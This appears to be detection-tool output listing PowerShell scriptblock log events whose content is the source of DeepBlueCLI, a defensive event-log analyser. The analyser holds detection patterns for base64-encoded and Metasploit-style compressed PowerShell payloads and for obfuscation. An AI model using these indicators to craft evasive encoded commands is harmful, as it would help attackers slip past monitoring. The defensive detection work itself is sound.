$servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.024 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.029 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.032 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.017 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 